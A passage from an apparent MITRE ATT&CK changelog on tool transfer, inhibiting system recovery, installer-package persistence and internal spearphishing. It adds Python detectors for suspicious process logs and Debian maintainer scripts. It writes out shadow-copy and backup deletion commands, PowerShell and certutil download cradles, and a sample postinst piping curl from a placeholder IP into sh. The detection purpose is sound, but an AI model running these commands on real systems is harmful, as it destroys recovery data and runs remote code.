compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)
- description (new): Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas) Adversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows `search-ms` protocol handler, to deliver malicious files to victims through remote file searches invoked by [User Execution](https://attack.mitre.org/techniques/T1204) (typically after interacting with [Phishing](https://attack.mitre.org/techniques/T1566) lures).(Citation: T1105: Trellix_search-ms) Files can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)
- x_mitre_version: 2.3 → 2.4
iterable_item_added
- external_references: {'source_name': 'T1105: Trellix_search-ms', 'description': 'Mathanraj Thangaraju, Sijo Jacob. (2023, July 26). Beyond File Search: A Novel Method for Exploiting the "search-ms" URI Protocol Handler. Retrieved March 15, 2024.', 'url': 'https://www.trellix.com/blogs/research/beyond-file-search-a-novel-method/'}
- x_mitre_contributors: Joe Wise
- x_mitre_contributors: Jeremy Hedges
- x_mitre_contributors: Selena Larson, @selenalarson
- x_mitre_platforms: Network

[T1490] Inhibit System Recovery

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description:

Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.

Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Furthermore, adversaries may disable recovery notifications, then corrupt backups.(Citation: disable_notif_synology_ransom)

A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:

* `vssadmin.exe` can be used to delete all volume shadow copies on a system - `vssadmin.exe delete shadows /all /quiet`
* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - `wmic shadowcopy delete`
* `wbadmin.exe` can be used to delete the Windows Backup Catalog - `wbadmin.exe delete catalog -quiet`
* `bcdedit.exe` can be used to disable automatic Windows recovery features by modifying boot configuration data - `bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no`
* `REAgentC.exe` can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system

On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.

Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)

New Description:

Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.

Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Furthermore, adversaries may disable recovery notifications, then corrupt backups.(Citation: disable_notif_synology_ransom)

A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:

* `vssadmin.exe` can be used to delete all volume shadow copies on a system - `vssadmin.exe delete shadows /all /quiet`
* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - `wmic shadowcopy delete`
* `wbadmin.exe` can be used to delete the Windows Backup Catalog - `wbadmin.exe delete catalog -quiet`
* `bcdedit.exe` can be used to disable automatic Windows recovery features by modifying boot configuration data - `bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no`
* `REAgentC.exe` can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system
* `diskshadow.exe` can be used to delete all volume shadow copies on a system - `diskshadow delete shadows all` (Citation: Diskshadow) (Citation: Crytox Ransomware)

On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.

Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)

New Mitigations:

Details
values_changed
- modified: 2023-10-03 17:30:59.482000+00:00 → 2024-04-12 02:30:08.379000+00:00
- description (old): Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options. Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Furthermore, adversaries may disable recovery notifications, then corrupt backups.(Citation: disable_notif_synology_ransom) A number of native Windows utilities have been used by adversaries to disable or delete system recovery features: * vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet * [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete * wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet * bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no * REAgentC.exe can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations. Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
- description (new): Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options. Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Furthermore, adversaries may disable recovery notifications, then corrupt backups.(Citation: disable_notif_synology_ransom) A number of native Windows utilities have been used by adversaries to disable or delete system recovery features: * vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet * [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete * wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet * bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no * REAgentC.exe can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system * diskshadow.exe can be used to delete all volume shadow copies on a system - diskshadow delete shadows all (Citation: Diskshadow) (Citation: Crytox Ransomware) On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations. Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
- x_mitre_detection (old): Use process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as vssadmin, wbadmin, bcdedit and REAgentC. The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity. Monitor the status of services involved in system recovery. Monitor the registry for changes associated with system recovery features (ex: the creation of HKEY_CURRENT_USER\Software\Policies\Microsoft\PreviousVersions\DisableLocalPage). For network infrastructure devices, collect AAA logging to monitor for `erase`, `format`, and `reload` commands being run in succession.
- x_mitre_detection (new): Use process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as vssadmin, wbadmin, bcdedit, REAgentC, and diskshadow. The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity. Monitor the status of services involved in system recovery. Monitor the registry for changes associated with system recovery features (ex: the creation of HKEY_CURRENT_USER\Software\Policies\Microsoft\PreviousVersions\DisableLocalPage). For network infrastructure devices, collect AAA logging to monitor for `erase`, `format`, and `reload` commands being run in succession.
- x_mitre_version: 1.3 → 1.4
iterable_item_added
- external_references: {'source_name': 'Diskshadow', 'description': 'Microsoft Windows Server. (2023, February 3). Diskshadow. Retrieved November 21, 2023.', 'url': 'https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow'}
- external_references: {'source_name': 'Crytox Ransomware', 'description': 'Romain Dumont. (2022, September 21). Technical Analysis of Crytox Ransomware. Retrieved November 22, 2023.', 'url': 'https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware'}
- x_mitre_contributors: Harjot Shah Singh
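The detection guidance for T1490 above (process monitoring of vssadmin, wbadmin, bcdedit, REAgentC and diskshadow, plus Event ID 524) and the download utilities listed under T1105 (certutil, PowerShell download cradles, the `search-ms` handler) both reduce to matching process images and command lines. The following is an added example, not part of the ATT&CK changelog or of any cited source: a small Python rule set run over constructed, Sysmon-style process-creation records. The record format, the field names `EventID`, `Image` and `CommandLine`, the rule names and the 198.51.100.7 address are all invented for the example. One caveat the `diskshadow delete shadows all` entry glosses over: diskshadow takes its verbs interactively or from a script file passed with `/s`, so "delete shadows" may never appear on the command line; the rule below therefore also flags script-driven diskshadow runs for review.

```python
import ntpath
import re
from dataclasses import dataclass

# Rules: (ATT&CK technique, rule name, image basename regex, command-line regex).
# Matching is case-insensitive; image regexes are anchored with fullmatch.
RULES = [
    ("T1490", "vssadmin shadow copy deletion",   r"vssadmin(\.exe)?",   r"delete\s+shadows"),
    ("T1490", "WMI shadow copy deletion",        r"wmic(\.exe)?",       r"shadowcopy\s+delete"),
    ("T1490", "wbadmin catalog deletion",        r"wbadmin(\.exe)?",    r"delete\s+catalog"),
    ("T1490", "bcdedit recovery disabled",       r"bcdedit(\.exe)?",
     r"recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures"),
    ("T1490", "REAgentC WinRE disabled",         r"reagentc(\.exe)?",   r"/disable"),
    # diskshadow reads its verbs interactively or from a script file (/s), so the
    # command line may not contain "delete shadows"; flag script-driven runs as well.
    ("T1490", "diskshadow shadow copy deletion", r"diskshadow(\.exe)?", r"delete\s+shadows|/s\b"),
    ("T1105", "certutil download",               r"certutil(\.exe)?",   r"-urlcache|-split"),
    ("T1105", "PowerShell download cradle",      r"(powershell|pwsh)(\.exe)?",
     r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bwget\b|\bcurl\b"),
    ("T1105", "finger download",                 r"finger(\.exe)?",     r"@"),
    ("T1105", "search-ms remote file search",    r".*",                 r"search-ms:"),
]
COMPILED = [(t, n, re.compile(i, re.I), re.compile(c, re.I)) for t, n, i, c in RULES]


@dataclass
class Event:
    event_id: int
    image: str = ""
    command_line: str = ""


def parse_line(line: str) -> Event:
    """Parse one 'Key=Value|Key=Value' record (a format constructed for this example)."""
    fields = dict(part.split("=", 1) for part in line.strip().split("|"))
    return Event(int(fields["EventID"]), fields.get("Image", ""), fields.get("CommandLine", ""))


def match_event(ev: Event) -> list[tuple[str, str]]:
    """Return (technique, rule name) for every rule the event satisfies."""
    hits = []
    if ev.event_id == 524:  # backup catalog deleted, the log-side trace of wbadmin delete catalog
        hits.append(("T1490", "Backup catalog deleted (Event ID 524)"))
    if ev.event_id != 1:    # only process-creation records carry an image and command line
        return hits
    base = ntpath.basename(ev.image)  # ntpath handles backslash paths on any host OS
    for technique, name, image_re, cmd_re in COMPILED:
        if image_re.fullmatch(base) and cmd_re.search(ev.command_line):
            hits.append((technique, name))
    return hits


def scan(lines: list[str]) -> list[tuple[int, str, str]]:
    """Return (line number, technique, rule name) for every hit across the log."""
    return [(n, t, r) for n, line in enumerate(lines, 1) for t, r in match_event(parse_line(line))]


# Constructed sample log (not real telemetry); 198.51.100.7 is a documentation address.
SAMPLE_LOG = [
    r"EventID=1|Image=C:\Windows\System32\vssadmin.exe|CommandLine=vssadmin.exe delete shadows /all /quiet",
    r"EventID=1|Image=C:\Windows\System32\wbem\WMIC.exe|CommandLine=wmic shadowcopy delete",
    r"EventID=1|Image=C:\Windows\System32\bcdedit.exe|CommandLine=bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures",
    r"EventID=1|Image=C:\Windows\System32\diskshadow.exe|CommandLine=diskshadow /s C:\Users\Public\ds.txt",
    r"EventID=1|Image=C:\Windows\System32\certutil.exe|CommandLine=certutil -urlcache -split -f http://198.51.100.7/a.exe a.exe",
    r"EventID=1|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://198.51.100.7/p')",
    r"EventID=524|Message=The backup catalog has been deleted",
    r"EventID=1|Image=C:\Windows\System32\vssadmin.exe|CommandLine=vssadmin list shadows",
    r"EventID=1|Image=C:\Windows\explorer.exe|CommandLine=explorer.exe C:\Users\alice\Documents",
    r'EventID=1|Image=C:\Windows\explorer.exe|CommandLine=explorer.exe "search-ms:query=invoice&crumb=location:\\198.51.100.7\share&displayname=Downloads"',
]

if __name__ == "__main__":
    for line_no, technique, rule in scan(SAMPLE_LOG):
        print(f"line {line_no}: {technique} {rule}")
```

The two benign records (a `vssadmin list shadows` and an ordinary explorer.exe launch) produce no hits, which is the point of matching on the destructive verbs rather than on the binary name alone; in production the same rules would be expressed in the SIEM's query language, and the Event ID 524 check should be correlated with the preceding wbadmin process event rather than alerted on by itself.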

[T1546.016] Event Triggered Execution: Installer Packages

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description:

Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)

Using legitimate applications, adversaries have distributed applications with modified installer scripts to execute malicious content. When a user installs the application, they may be required to grant administrative permissions to allow the installation. At the end of the installation process of the legitimate application, content such as macOS `postinstall` scripts can be executed with the inherited elevated permissions. Adversaries can use these scripts to execute a malicious executable or install other malicious components (such as a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)) with the elevated permissions.(Citation: Application Bundle Manipulation Brandon Dalton)(Citation: wardle evilquest parti)

Depending on the distribution, Linux versions of package installer scripts are sometimes called maintainer scripts or post installation scripts. These scripts can include `preinst`, `postinst`, `prerm`, `postrm` scripts and run as root when executed.

For Windows, the Microsoft Installer services uses `.msi` files to manage the installing, updating, and uninstalling of applications. Adversaries have leveraged `Prebuild` and `Postbuild` events to run commands before or after a build when installing .msi files.(Citation: Windows AppleJeus GReAT)(Citation: Debian Manual Maintainer Scripts)

New Description:

Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)

Using legitimate applications, adversaries have distributed applications with modified installer scripts to execute malicious content. When a user installs the application, they may be required to grant administrative permissions to allow the installation. At the end of the installation process of the legitimate application, content such as macOS `postinstall` scripts can be executed with the inherited elevated permissions. Adversaries can use these scripts to execute a malicious executable or install other malicious components (such as a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)) with the elevated permissions.(Citation: Application Bundle Manipulation Brandon Dalton)(Citation: wardle evilquest parti)(Citation: Windows AppleJeus GReAT)(Citation: Debian Manual Maintainer Scripts)

Depending on the distribution, Linux versions of package installer scripts are sometimes called maintainer scripts or post installation scripts. These scripts can include `preinst`, `postinst`, `prerm`, `postrm` scripts and run as root when executed.

For Windows, the Microsoft Installer services uses `.msi` files to manage the installing, updating, and uninstalling of applications. These installation routines may also include instructions to perform additional actions that may be abused by adversaries.(Citation: Microsoft Installation Procedures)
Details
values_changed
- modified: 2022-10-19 22:44:20.305000+00:00 → 2024-04-12 02:23:44.583000+00:00
- description (old): Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton) Using legitimate applications, adversaries have distributed applications with modified installer scripts to execute malicious content. When a user installs the application, they may be required to grant administrative permissions to allow the installation. At the end of the installation process of the legitimate application, content such as macOS `postinstall` scripts can be executed with the inherited elevated permissions. Adversaries can use these scripts to execute a malicious executable or install other malicious components (such as a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)) with the elevated permissions.(Citation: Application Bundle Manipulation Brandon Dalton)(Citation: wardle evilquest parti) Depending on the distribution, Linux versions of package installer scripts are sometimes called maintainer scripts or post installation scripts. These scripts can include `preinst`, `postinst`, `prerm`, `postrm` scripts and run as root when executed. For Windows, the Microsoft Installer services uses `.msi` files to manage the installing, updating, and uninstalling of applications. Adversaries have leveraged `Prebuild` and `Postbuild` events to run commands before or after a build when installing .msi files.(Citation: Windows AppleJeus GReAT)(Citation: Debian Manual Maintainer Scripts)
- description (new): Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton) Using legitimate applications, adversaries have distributed applications with modified installer scripts to execute malicious content. When a user installs the application, they may be required to grant administrative permissions to allow the installation. At the end of the installation process of the legitimate application, content such as macOS `postinstall` scripts can be executed with the inherited elevated permissions. Adversaries can use these scripts to execute a malicious executable or install other malicious components (such as a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)) with the elevated permissions.(Citation: Application Bundle Manipulation Brandon Dalton)(Citation: wardle evilquest parti)(Citation: Windows AppleJeus GReAT)(Citation: Debian Manual Maintainer Scripts) Depending on the distribution, Linux versions of package installer scripts are sometimes called maintainer scripts or post installation scripts. These scripts can include `preinst`, `postinst`, `prerm`, `postrm` scripts and run as root when executed. For Windows, the Microsoft Installer services uses `.msi` files to manage the installing, updating, and uninstalling of applications. These installation routines may also include instructions to perform additional actions that may be abused by adversaries.(Citation: Microsoft Installation Procedures)
- x_mitre_attack_spec_version: 2.1.0 → 3.2.0
- x_mitre_version: 1.0 → 1.1
iterable_item_added
- external_references: {'source_name': 'Microsoft Installation Procedures', 'description': 'Microsoft. (2021, January 7). Installation Procedure Tables Group. Retrieved December 27, 2023.', 'url': 'https://learn.microsoft.com/windows/win32/msi/installation-procedure-tables-group'}
- x_mitre_contributors: Alexander Rodchenko
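The Linux paragraph of the description above says where the scripts live (`preinst`, `postinst`, `prerm`, `postrm` in the package's control archive) and that they run as root, which makes reading them before installation the obvious check. The following is an added example, not code from ATT&CK or from any cited source: it builds a minimal Debian package in memory so that it runs offline, then extracts and audits the maintainer scripts. The package, its `curl ... | sh` postinst and the 198.51.100.7 address are constructed for the example; a real package would be produced by `dpkg-deb` rather than the hand-rolled `ar` writer used here, and the substring audit is a first pass to decide what a human reads, not a verdict.

```python
import io
import tarfile
import time

MAINTAINER_SCRIPTS = {"preinst", "postinst", "prerm", "postrm"}
# Markers that warrant a human look when found in a script that will run as root.
SUSPICIOUS = (b"curl ", b"wget ", b"| sh", b"base64 -d", b"/etc/cron", b"systemctl enable", b"chmod +s")


def _ar_member(name: bytes, data: bytes) -> bytes:
    """One member of a common-format ar archive: 60-byte header, data, pad to even length."""
    header = b"%-16s%-12d%-6d%-6d%-8s%-10d`\n" % (name, int(time.time()), 0, 0, b"100644", len(data))
    assert len(header) == 60
    return header + data + (b"\n" if len(data) % 2 else b"")


def _targz(files: dict[str, bytes]) -> bytes:
    """Build an in-memory .tar.gz (mode 0755 so that scripts are executable when unpacked)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for name, data in files.items():
            info = tarfile.TarInfo(name)
            info.size, info.mode = len(data), 0o755
            tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def build_deb(control: bytes, scripts: dict[str, bytes], payload: dict[str, bytes]) -> bytes:
    """Assemble debian-binary + control.tar.gz + data.tar.gz, the member layout dpkg-deb produces."""
    control_tar = _targz({"./control": control, **{"./" + n: body for n, body in scripts.items()}})
    return (b"!<arch>\n"
            + _ar_member(b"debian-binary", b"2.0\n")
            + _ar_member(b"control.tar.gz", control_tar)
            + _ar_member(b"data.tar.gz", _targz(payload)))


def ar_members(blob: bytes) -> dict[bytes, bytes]:
    """Parse an ar archive into {member name: bytes}."""
    if blob[:8] != b"!<arch>\n":
        raise ValueError("not an ar archive")
    pos, members = 8, {}
    while pos + 60 <= len(blob):
        header = blob[pos:pos + 60]
        name = header[:16].rstrip(b" ").rstrip(b"/")  # GNU ar appends '/' to member names
        size = int(header[48:58])
        members[name] = blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)               # members are padded to an even offset
    return members


def maintainer_scripts(deb: bytes) -> dict[str, bytes]:
    """Return the preinst/postinst/prerm/postrm scripts carried in the control archive."""
    control_tar = next(v for k, v in ar_members(deb).items() if k.startswith(b"control.tar"))
    found = {}
    with tarfile.open(fileobj=io.BytesIO(control_tar), mode="r:*") as tf:
        for member in tf.getmembers():
            base = member.name.rsplit("/", 1)[-1]
            if member.isfile() and base in MAINTAINER_SCRIPTS:
                found[base] = tf.extractfile(member).read()
    return found


def audit(scripts: dict[str, bytes]) -> dict[str, list[str]]:
    """Map each script to the suspicious markers it contains; an empty dict means nothing flagged."""
    return {name: [m.decode() for m in SUSPICIOUS if m in body]
            for name, body in scripts.items() if any(m in body for m in SUSPICIOUS)}


# Constructed sample package: a harmless payload with a postinst that fetches and runs remote code.
SAMPLE_DEB = build_deb(
    control=b"Package: hello\nVersion: 1.0\nArchitecture: all\nMaintainer: example\nDescription: demo\n",
    scripts={"postinst": b"#!/bin/sh\nset -e\ncurl -s http://198.51.100.7/x | sh\n"},
    payload={"./usr/bin/hello": b"#!/bin/sh\necho hello\n"},
)

if __name__ == "__main__":
    for name, hits in audit(maintainer_scripts(SAMPLE_DEB)).items():
        print(f"{name}: {', '.join(hits)}")
```

Nothing in `data.tar.gz` is inspected here on purpose: the installed files are what most people review, while the control archive is where the root-privileged code runs, which is exactly why the technique works. The same two-step extraction applies to a macOS flat `.pkg` (an xar archive whose `Scripts` payload holds `preinstall`/`postinstall`), only the container format differs.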

[T1090.001] Proxy: Internal Proxy

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_deprecated: False
values_changed
- modified: 2020-03-15 00:46:26.598000+00:00 → 2024-03-07 14:29:02.408000+00:00
- x_mitre_version: 1.0 → 1.1
iterable_item_added
- x_mitre_platforms: Network

[T1534] Internal Spearphishing

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description:

Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged campaign where an email account is owned either by controlling the user's device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.(Citation: Trend Micro When Phishing Starts from the Inside 2017)

Adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic email login interfaces.

There have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017) The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the campaign and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.(Citation: THE FINANCIAL TIMES LTD 2019.)

New Description:

After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)

For example, adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic login interfaces.

Adversaries may also leverage internal chat apps, such as Microsoft Teams, to spread malicious content or engage users in attempts to capture sensitive information and/or credentials.(Citation: Int SP - chat apps)
Details
dictionary_item_added
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_deprecated: False
dictionary_item_removed
- x_mitre_permissions_required: ['User']
values_changed
- modified: 2022-03-08 21:29:30.249000+00:00 → 2024-02-16 13:09:39.215000+00:00
- description (old): Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged campaign where an email account is owned either by controlling the user's device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.(Citation: Trend Micro When Phishing Starts from the Inside 2017) Adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic email login interfaces. There have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017) The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the campaign and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.(Citation: THE FINANCIAL TIMES LTD 2019.)
